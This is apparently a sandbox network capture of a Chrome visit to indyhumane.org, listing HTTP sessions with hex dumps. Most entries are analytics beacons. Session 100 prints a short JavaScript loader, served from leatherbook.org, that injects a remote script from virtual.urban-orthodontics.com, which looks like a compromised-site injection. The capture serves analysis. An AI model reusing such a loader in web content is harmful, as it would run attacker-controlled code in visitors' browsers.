                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: dd b1 47 75 34 21 bc d1 26 e0 6c a7 2d 77 bd ea 20 42 78 2b 29 d0 85 f8 07 9a c5 7a 3e f0 32 b2 a4 5d 08 00 da 64 37 a1 5b eb 16 74 6e 99 4d 8b 26 69 34 4d 4d 24 33 25 91 b8 a8 48 d5 d1 84 f0 1a 05 c5 a5 47 f6 b2 ef d8 7f 90 35 5b 77 b2 72 d3 76 d6 6f df ad 3a 9a 10 de a2 02 b8 dc 69 cb 7d 5f 75 10 21 bc 91 14 e8 42 fc 89 66 b1 06 03 4f 01 57 a8 ce 22 84 4a 99 29 89 f4 68 d7 92 1e ed 5a d2 32 33 fd c8 d1 67 89 b1 d1 aa a3 09 e1 33 0a 4b cb d9 73 d0 d5 21 7e e3 ce bd 2c fb 75 0b 4b d6 6d e2 60 61 b1 ea 68 42 a8 f6 32 70 9d d3 96 5b ab 3a 88 10 de 44 0a 74 21 7e 47 b3 58 b3 81 8f 81 ee aa b3 08 e1 69 46 83 81 7e 9d db d2 af 73 5b 3a b7 6c 46 66 4a 22 4d 92 13 48 4d 88 53 1d 4d 08 bf b1 bf a0 f0 48 c1 be 66 cb 4e 16 af dd c8 a2 35 1b b1 37 34 a8 8e 26 84 0a
                                                                                                                                                                                                                                                        Data Ascii: Gu4!&l-w Bx+)z>2]d7[tnM&i4MM$3%HG5[wrvo:i}_u!BfOW"J)hZ23g3Ks!~,uKm`ahB2p[:Dt!~GXiF~s[:lFfJ"MHMSMHfN574&
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: 52 ac 0b 6f f3 06 ae 2e ef 75 aa 83 08 71 22 a4 40 17 3e 4d b3 58 63 81 4f 81 21 aa b3 08 e1 0b cc 41 26 2e 1c 3d 8c 67 6f 9a 4c b0 39 48 75 1c 21 84 8f 71 38 9c 7c bf 74 25 cf 7c f8 15 8b d6 6c a0 a6 b6 1e 7b 43 83 ea 58 42 fc 66 3e 70 ba d3 96 5b ac 3a 88 10 c7 4b 0a 74 e1 b3 34 8b b5 39 f0 35 d0 5a 75 16 21 7c cd 88 5e 5d 78 ef be 1b 49 8c 8d 56 1d 45 08 e1 a3 76 ec 3f c8 6b 5f fc c0 7b df cd a5 a0 b8 8c da fa 7a 99 55 17 de 60 13 30 da 69 cb dd ae 3a 88 10 c7 43 0a 74 e1 93 34 8b b5 0f f0 25 90 a0 3a 8b 10 be aa 4b ab 66 bc 7b df 8d b4 c9 6a 82 c1 a0 a9 8e 23 84 f0 51 0e 87 93 19 3f cc e7 d9 0f 73 d9 b8 73 2f 55 35 b5 34 38 1c aa 63 89 c0 76 18 d7 4c fa 42 d5 41 84 38 56 52 a0 0b 9f a3 59 ac e7 00 6f 01 21 8a a3 08 e1 f3 9a a6 26 31 fd ce ab 19 dc bd
                                                                                                                                                                                                                                                        Data Ascii: Ro.uq"@>MXcO!A&.=goL9Hu!q8|t%|l{CXBf>p[:Kt495Zu!|^]xIVEv?k_{zU`0i:Ct4%:Kf{j#Q?ss/U548cvLBA8VRYo!&1
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: 84 08 60 cb 37 6e e5 dd 6f e7 32 6b f1 4a b6 ec d9 af 3a 8e f0 2f 3f 00 a7 3b 6d b9 55 aa 83 88 c0 63 9c 3a 75 aa ea 0c 22 c0 68 16 6b 34 ae 33 ce 07 ab ce e2 4d 96 6f dc 8a d1 60 a0 47 bb 96 98 8c 46 dd c7 6f 92 92 48 69 45 25 8b d7 6e d2 7d 6c 11 58 ca ab aa 59 bb 6d 17 9d 72 b2 c9 4c 49 54 1d 47 08 11 a0 d2 12 e3 19 d9 a7 1b 1d 73 b2 08 09 36 73 a8 a8 84 b2 4a a9 a7 84 2e 9a 03 03 a7 4d 9f 31 73 ea e4 71 32 b3 21 3c 4a 66 d0 85 47 69 16 6b 02 f0 3d d0 55 75 16 6f 14 1d 11 ce e3 d7 5e cc c5 63 86 63 30 e8 df cc 3e ef 70 11 c3 a6 dc c5 86 9d 7b 75 1f 5b 04 9e 9e ed 5b f1 d6 bd d7 e9 d2 27 41 08 21 4e d4 37 0b 6d cc 9c bb 84 af 7e fe 85 c3 25 65 aa e3 08 ff b0 0a 38 d9 69 cb cd 57 1d 44 04 0e 29 d0 85 c7 68 16 6b 3a f0 23 d0 46 75 16 6f 96 91 94 c0 4b b7
                                                                                                                                                                                                                                                        Data Ascii: `7no2kJ:/?;mUc:u"hk43Mo`GFoHiE%n}lXYmrLITGs6sJ.M1sq2!<JfGik=Uuo^cc0>p{u[['A!N7m~%e8iWD)hk:#FuoK
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: 41 3b f2 d1 d8 f8 63 26 a3 11 73 90 89 20 93 89 f0 d0 60 a2 c2 c3 88 0a 0f 23 32 3c 94 c8 b0 50 a2 c2 c3 88 8d 8a 20 31 26 9a b8 e8 08 12 62 a2 89 8f 8e 24 32 2c d4 03 7f ca 42 78 c6 c6 9d 7b f9 64 f6 22 ee 9b 3e 83 06 87 43 75 1c e1 1b 4a 81 a1 4e 5b ee 0a d5 41 84 6f 93 02 5d 9c 10 cd 62 ed 04 cc 41 96 b5 7b d4 73 37 5f c6 65 67 9c ac db d1 6b 4e a7 93 cf e7 2d e1 cc 5b 1e d6 65 3c 21 7e 13 13 19 ce f7 cf dd 47 8f 76 2d 55 47 39 6e b5 75 f5 1c 2a 2a e1 60 61 f1 91 d7 a1 c2 12 f2 1a 3f 1e 2e 29 a3 ba d6 35 03 5e 67 b7 53 57 6f a7 de 6e a7 de de 40 5d 7d fd 91 1f af b7 db 71 38 7c f3 3d f7 b7 42 3e c8 64 22 c8 e4 fa 18 62 0e c2 1c 14 84 39 c8 44 70 e3 c7 10 b3 99 98 c8 70 12 63 a3 48 89 8f 25 35 21 8e b4 c4 38 52 e3 e3 48 4d 70 7d df 1c a4 ef 91 91 42 b8
                                                                                                                                                                                                                                                        Data Ascii: A;c&s `#2<P 1&b$2,Bx{d">CuJN[Ao]bA{s7_egkN-[e<!~Gv-UG9nu**`a?.)5^gSWon@]}q8|=B>d"b9DppcH%5!8RHMp}B
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: c6 e5 ee 05 aa c3 08 ef 26 05 ba f8 57 9a c5 1a 0d e4 02 ed 54 67 11 42 f8 87 1f 96 ae e2 a9 0f be 24 2a 3c ec c8 2c 79 de e1 e2 23 67 87 db 1b 1a 90 06 a6 c2 1d 1a 1c 0e 1a 7e b7 44 fe 70 49 19 6b b7 ee e2 dd 6f e7 10 64 32 91 1c 17 43 ef 8e ad 19 d0 a5 3d fd bb b4 a5 65 66 ba e2 c4 c2 57 04 9b 83 e8 d5 be 15 5f 3f 7d 0f 2f 7f f6 1d 53 5f 9d 21 27 41 88 3f 6b 0b 7c ad 59 ac 23 9c b6 dc 52 d5 61 84 f7 92 2e ee e2 1f 69 16 6b 08 f0 0d 30 44 75 16 3d 9c 31 b8 0f cf dd 7c 19 69 89 72 ce 6e a0 b8 e9 99 37 78 e2 bd cf 55 c7 10 7f c3 1c 64 42 d3 34 ec f6 06 99 1d 17 5e c5 68 30 60 32 19 31 1a 0c c4 47 47 d2 af 73 5b 06 77 ef c8 90 ee 1d ff 73 6b 86 10 00 f5 76 3b 6b b6 ee e4 fa 27 5f 63 e1 ea 0d aa e3 08 ef 33 07 18 ed b4 e5 56 ab 0e 22 bc 93 cc a0 8b bf a5 59
                                                                                                                                                                                                                                                        Data Ascii: &WTgB$*<,y#g~DpIkod2C=efW_?}/S_!'A?k|Y#Ra.ik0Du=1|irn7xUdB4^h0`21GGs[wskv;k'_c3V"Y
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1369INData Raw: 39 7b 58 5f 5a 66 a6 93 96 18 27 4d c6 fc d0 fc 95 eb b9 f3 c5 77 58 bc 76 93 34 0f 0c 5c 5f 01 67 38 6d b9 b2 74 26 80 98 54 07 10 1e f7 1c 01 58 9c 03 14 96 96 53 58 5a ae eb 98 06 83 46 9f 8e 6d b8 ed c2 b3 4e 78 ac 94 f8 58 1c 0e 07 b6 0d 5b 75 48 e6 5e 71 51 91 c4 44 84 eb 36 5e 51 59 05 cf 7e 98 4b bd dd ae db 98 42 08 e1 af ca 2a ab 78 e3 ab 1f 79 e3 ab 1f e9 94 93 cd d8 e1 fd 18 d6 a3 33 4d 53 93 48 8e 8b 51 1d 4f e8 64 60 d7 f6 7c f5 e4 dd 5c ff e4 6b 7c 3a 7b 91 f4 22 08 4c 63 70 dd bb 4f 51 1d 44 78 8e ec 41 0f 20 9a c5 7a 1b 70 85 ea 1c fe c4 e1 70 f2 dd e2 15 ba 8d 77 ce f0 fe 34 4d 4d d2 6d 3c 77 39 73 48 1f 3a b4 c8 d2 65 2c 87 c3 c9 bc 15 eb a4 38 17 42 88 e3 b0 66 eb 4e ee 7c f1 5d 7a 5d 74 13 d7 3e fe 2a 9f ce 5e c4 96 3d fb e5 6b aa 9f
                                                                                                                                                                                                                                                        Data Ascii: 9{X_Zf'MwXv4\_g8mt&TXSXZFmNxX[uH^qQD6^QY~KB*xy3MSHQOd`|\k|:{"LcpOQDxA zppw4MMm<w9sH:e,8BfN|]z]t>*^=k


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        98192.168.2.44987244.219.163.774432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC346OUTGET /track.js HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.gaug.es
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC256INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        ETag: "65f04ae5-ef5"
                                                                                                                                                                                                                                                        Last-Modified: Tue, 12 Mar 2024 12:30:29 GMT
                                                                                                                                                                                                                                                        Server: nginx/1.10.3 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 3829
                                                                                                                                                                                                                                                        Connection: Close
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC3829INData Raw: 76 61 72 20 5f 67 61 75 67 65 73 3d 5f 67 61 75 67 65 73 7c 7c 5b 5d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 28 5f 67 61 75 67 65 73 5b 27 73 6c 69 63 65 27 5d 29 3f 5f 67 61 75 67 65 73 2e 73 6c 69 63 65 28 30 29 3a 5b 5d 3b 5f 67 61 75 67 65 73 3d 7b 74 72 61 63 6b 5f 72 65 66 65 72 72 65 72 3a 74 72 75 65 2c 69 6d 61 67 65 3a 6e 65 77 20 49 6d 61 67 65 28 29 2c 74 72 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 65 74 43 6f 6f 6b 69 65 28 27 5f 67 61 75 67 65 73 5f 63 6f 6f 6b 69 65 27 2c 31 2c 31 29 3b 76 61 72 20 61 3d 74 68 69 73 2e 75 72 6c 28 29 3b 69 66 28 61 29 7b 74 68 69 73 2e 69 6d 61 67 65 2e 73 72 63 3d 61 3b 76 61 72 20 62 3d 36 30 2a 36 30 2c 66 3d 62 2a 32 34 2c 63 3d 66 2a 33 31 2c 64 3d 66 2a 33 36 35
                                                                                                                                                                                                                                                        Data Ascii: var _gauges=_gauges||[];(function(){var h=(_gauges['slice'])?_gauges.slice(0):[];_gauges={track_referrer:true,image:new Image(),track:function(){this.setCookie('_gauges_cookie',1,1);var a=this.url();if(a){this.image.src=a;var b=60*60,f=b*24,c=f*31,d=f*365


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        99192.168.2.44987344.219.163.774432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC1026OUTGET /track.gif?h[site_id]=642b0b5c56d12352021fc47b&h[resource]=https%3A%2F%2Findyhumane.org%2F&h[referrer]=&h[title]=IndyHumane%20-%20IndyHumane&h[user_agent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&h[unique]=1&h[unique_hour]=1&h[unique_day]=1&h[unique_month]=1&h[unique_year]=1&h[screenx]=1280&h[browserx]=1280&h[browsery]=907&timestamp=1736387954872 HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.gaug.es
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC349INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, private
                                                                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Expires: Sat, 25 Nov 2000 05:00:00 GMT
                                                                                                                                                                                                                                                        Last-Modified: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Server: nginx/1.10.3 (Ubuntu)
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Content-Length: 35
                                                                                                                                                                                                                                                        Connection: Close
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC35INData Raw: 47 49 46 38 39 61 01 00 01 00 80 ff 00 ff ff ff 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                        Data Ascii: GIF89a,D;


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        100192.168.2.449866185.121.15.1374432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC382OUTGET /SR0ymlWkoOcyiZuXCrFr3HWgupYiPaMXa-GLcDabjeW HTTP/1.1
                                                                                                                                                                                                                                                        Host: leatherbook.org
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC299INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                        Content-Length: 227
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC227INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 75 2c 71 2c 79 2c 64 2c 6e 29 7b 64 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 71 29 3b 6e 3d 75 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 71 29 5b 30 5d 3b 64 2e 61 73 79 6e 63 3d 31 3b 64 2e 73 72 63 3d 79 3b 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 64 2c 6e 29 3b 7d 29 28 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 68 74 74 70 73 3a 2f 2f 76 69 72 74 75 61 6c 2e 75 72 62 61 6e 2d 6f 72 74 68 6f 64 6f 6e 74 69 63 73 2e 63 6f 6d 2f 53 7a 6c 70 6e 54 41 62 43 76 51 76 47 31 4f 76 66 51 70 46 76 7a 6b 62 55 37 38 78 51 41 58 37 4f 31 73 66 76 7a 59 3d 27 29 3b
                                                                                                                                                                                                                                                        Data Ascii: ;(function(u,q,y,d,n){d=u.createElement(q);n=u.getElementsByTagName(q)[0];d.async=1;d.src=y;n.parentNode.insertBefore(d,n);})(document,'script','https://virtual.urban-orthodontics.com/SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY=');


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        101192.168.2.44987118.244.18.384432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC855OUTGET /b2?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952098&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9= HTTP/1.1
                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: UID=10Eb84084683af8249c0c7e1736387955; XID=10Eb84084683af8249c0c7e1736387955
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC327INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 182ccc7786c60fec555dbcd8ce6baa5e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: WRysM1FqBsagWumQ4jwv3WcLhVPx-AMj7WsKIuOeGDnVfe6qWRTdig==


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        102192.168.2.44986818.244.18.384432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC855OUTGET /b2?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952107&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9= HTTP/1.1
                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Cookie: UID=1287479d2ea4f533b1a92731736387955; XID=1287479d2ea4f533b1a92731736387955
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC327INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 872b8cb7808b8e013ecc6c3cc24aa826.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: 3I0lLLVK-E_1CPjecSodpnW7oWq6NWKuKyKCaQfr9VRHKt8s3B5l9w==


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        103192.168.2.449874142.250.186.1644432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC997OUTPOST /ccm/collect?en=page_view&dl=https%3A%2F%2Findyhumane.org%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=1430938266.1736387954&dt=IndyHumane%20-%20IndyHumane&auid=1223850198.1736387954&navt=n&npa=0&gtm=45He5170v898710595za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&tft=1736387953959&tfd=8745&apve=1 HTTP/1.1
                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC578INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:16 GMT
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        Vary: X-Origin
                                                                                                                                                                                                                                                        Vary: Referer
                                                                                                                                                                                                                                                        Server: scaffolding on HTTPServer2
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://indyhumane.org
                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: date,vary,vary,vary,server,content-length
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        104192.168.2.449875185.76.79.504432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:16 UTC568OUTGET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1
                                                                                                                                                                                                                                                        Host: virtual.urban-orthodontics.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:18 UTC181INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:18 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
